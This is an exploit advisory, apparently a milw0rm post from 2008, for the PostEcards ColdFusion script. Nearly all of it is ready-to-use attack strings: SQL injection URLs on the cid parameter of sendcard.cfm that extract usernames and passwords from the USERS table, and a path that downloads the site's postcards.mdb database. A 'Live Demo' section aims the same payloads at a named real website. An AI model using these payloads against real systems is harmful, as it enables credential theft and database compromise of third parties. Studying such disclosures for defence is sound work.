########################################################################### #-------------------------------AlpHaNiX----------------------------------# ########################################################################### #Found By : AlpHaNiX #website : www.offensivetrack.org #contact : AlpHa[AT]HACKER[DOT]BZ ########################################################################### #script : PostEcards #download : http://www.funscripts.net/old_coldfusion/download.php?fname=postcards ########################################################################### #Exploits : --=[SQL INJECTION]=-- http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00 http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,pwd,null%20FROM%20USERS%00 --=[DATABASE DISCLOSURE]=-- http://www.target.com/database/postcards.mdb #Live Demo http://www.melink.com/PostCards/database/postcards.mdb http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00 #Greetz For ########################################################################### # milw0rm.com [2008-12-09]